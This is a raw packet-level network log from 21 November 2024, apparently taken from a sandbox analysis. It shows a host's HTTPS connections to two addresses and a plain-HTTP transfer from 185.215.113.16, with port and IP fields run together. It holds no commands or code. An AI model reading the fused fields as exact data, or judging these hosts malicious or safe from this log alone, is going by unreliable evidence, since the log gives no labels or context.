                                                                                                                                                                        Nov 21, 2024 10:37:40.593096972 CET4434977413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.593147993 CET49774443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.593286991 CET49774443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.593303919 CET4434977413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.593312979 CET49774443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.593317032 CET4434977413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.595653057 CET49779443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.595693111 CET4434977913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.595760107 CET49779443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.595871925 CET49779443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.595885038 CET4434977913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.762501001 CET4434977513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.762671947 CET4434977513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.762742996 CET49775443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.762860060 CET49775443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.762887955 CET4434977513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.762901068 CET49775443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.762909889 CET4434977513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.765835047 CET49780443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.765866041 CET4434978013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:40.766052961 CET49780443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.766380072 CET49780443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:40.766395092 CET4434978013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.038554907 CET4434977613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.039115906 CET49776443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:41.039133072 CET4434977613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.039664030 CET49776443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:41.039675951 CET4434977613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.157629013 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.157716036 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.158008099 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:41.160119057 CET49766443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:41.160149097 CET44349766188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.229027987 CET49781443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:41.229070902 CET44349781188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.229274035 CET49781443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:41.229532957 CET49781443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:41.229548931 CET44349781188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.492546082 CET4434977613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.492599010 CET4434977613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.492844105 CET49776443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:41.492844105 CET49776443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:41.493355989 CET49776443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:41.493372917 CET4434977613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.495759964 CET49782443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:41.495790005 CET4434978213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.495965004 CET49782443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:41.496143103 CET49782443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:41.496156931 CET4434978213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.929306984 CET4434977713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.942940950 CET49777443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:41.942970991 CET4434977713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:41.956253052 CET49777443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:41.956258059 CET4434977713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.197899103 CET4434977913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.208187103 CET49779443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.208206892 CET4434977913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.208623886 CET49779443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.208627939 CET4434977913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.366298914 CET4434977813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.423477888 CET49778443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.477639914 CET49778443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.477653980 CET4434977813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.478188992 CET49778443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.478193998 CET4434977813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.486382961 CET44349781188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.486530066 CET49781443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:42.492377043 CET49781443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:42.492391109 CET44349781188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.492631912 CET44349781188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.493201971 CET4434977713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.493274927 CET4434977713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.493319035 CET49777443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.494184971 CET49781443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:42.494184971 CET49781443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:42.494255066 CET44349781188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.494663954 CET49777443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.494682074 CET4434977713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.494693041 CET49777443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.494698048 CET4434977713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.549417019 CET4434978013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.550307035 CET49783443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.550354958 CET4434978313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.550479889 CET49783443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.550924063 CET49783443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.550936937 CET4434978313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.550966978 CET49780443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.551040888 CET4434978013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.551464081 CET49780443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.551481009 CET4434978013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.642065048 CET4434977913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.642162085 CET4434977913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.642215967 CET49779443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.642555952 CET49779443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.642570019 CET4434977913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.642586946 CET49779443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.642591953 CET4434977913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.645899057 CET49784443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.645946026 CET4434978413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.645998001 CET49784443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.646162987 CET49784443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.646173954 CET4434978413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.809541941 CET4434977813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.809612989 CET4434977813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.809684038 CET49778443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.809807062 CET49778443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.809807062 CET49778443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.809827089 CET4434977813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.809837103 CET4434977813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.812541008 CET49785443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.812576056 CET4434978513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.812645912 CET49785443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.812800884 CET49785443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.812812090 CET4434978513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.992233992 CET4434978013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.992304087 CET4434978013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.992394924 CET49780443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.992599010 CET49780443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.992618084 CET4434978013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.992630959 CET49780443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.992636919 CET4434978013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.995215893 CET49786443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.995256901 CET4434978613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:42.995347023 CET49786443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.995488882 CET49786443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:42.995507956 CET4434978613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.181993008 CET44349781188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.182076931 CET44349781188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.182188034 CET49781443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:43.182271957 CET49781443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:43.182286978 CET44349781188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.182307959 CET49781443192.168.2.6188.114.97.3
                                                                                                                                                                        Nov 21, 2024 10:37:43.182313919 CET44349781188.114.97.3192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.183747053 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:43.216882944 CET4434978213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.217391968 CET49782443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:43.217437983 CET4434978213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.217833042 CET49782443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:43.217848063 CET4434978213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.303250074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.303353071 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:43.303541899 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:43.424052000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.653089046 CET4434978213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.653147936 CET4434978213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.653354883 CET49782443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:43.653403997 CET49782443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:43.653419971 CET4434978213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.653433084 CET49782443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:43.653439999 CET4434978213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.655997038 CET49788443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:43.656039953 CET4434978813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:43.656209946 CET49788443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:43.656409025 CET49788443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:43.656419039 CET4434978813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.329679012 CET4434978313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.331914902 CET49783443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.331954956 CET4434978313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.332710981 CET49783443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.332716942 CET4434978313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.434746981 CET4434978413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.436866045 CET49784443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.436894894 CET4434978413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.437323093 CET49784443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.437329054 CET4434978413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.533390999 CET4434978513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.534087896 CET49785443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.534110069 CET4434978513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.534564018 CET49785443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.534569979 CET4434978513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699290037 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699409962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699421883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699438095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699449062 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699459076 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699470043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699485064 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.699490070 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699501038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699512959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.699527025 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.699546099 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.780942917 CET4434978313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.781475067 CET4434978313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.781584978 CET49783443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.781584978 CET49783443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.781584978 CET49783443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.788563013 CET49789443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.788615942 CET4434978913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.788703918 CET49789443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.788969040 CET49789443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.788985014 CET4434978913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.820293903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.820362091 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.820425987 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.840652943 CET4434978613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.859293938 CET49786443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.859354019 CET4434978613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.859802008 CET49786443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.859859943 CET4434978613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.880542994 CET4434978413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.880620956 CET4434978413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.880687952 CET49784443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.892402887 CET49784443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.892452955 CET4434978413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.892482996 CET49784443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.892499924 CET4434978413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.900593996 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.900681019 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.900755882 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.904858112 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.904963970 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.905039072 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.907018900 CET49790443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.907062054 CET4434979013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.907130003 CET49790443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.907367945 CET49790443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.907382965 CET4434979013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.913295031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.913417101 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.913484097 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.921753883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.921838045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.921925068 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.930186987 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.930299997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.930377960 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.938657045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.938711882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.938767910 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.947082043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.947154045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.947211981 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.955450058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.955619097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.955676079 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.963979959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.964036942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.964082956 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.967928886 CET4434978513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.968089104 CET4434978513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.968142986 CET49785443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.969779015 CET49785443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.969789028 CET4434978513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.969800949 CET49785443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:44.969805956 CET4434978513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.972392082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.972482920 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.972523928 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:44.980983973 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.980999947 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:44.981067896 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.024991035 CET49791443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.025078058 CET4434979113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.025165081 CET49791443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.032968998 CET49791443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.033000946 CET4434979113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.095369101 CET49783443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.095401049 CET4434978313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.101752043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.101938963 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.101999998 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.104543924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.104600906 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.104646921 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.109551907 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.109591961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.109652042 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.117816925 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.117837906 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.117908955 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.119438887 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.119467020 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.119504929 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.124542952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.124636889 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.124677896 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.130150080 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.130198002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.130249023 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.134788990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.134903908 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.134947062 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.139902115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.139998913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.140054941 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.144987106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.145112038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.145158052 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.150099993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.150156975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.150202036 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.155220985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.155261993 CET8049787185.215.113.16192.168.2.6
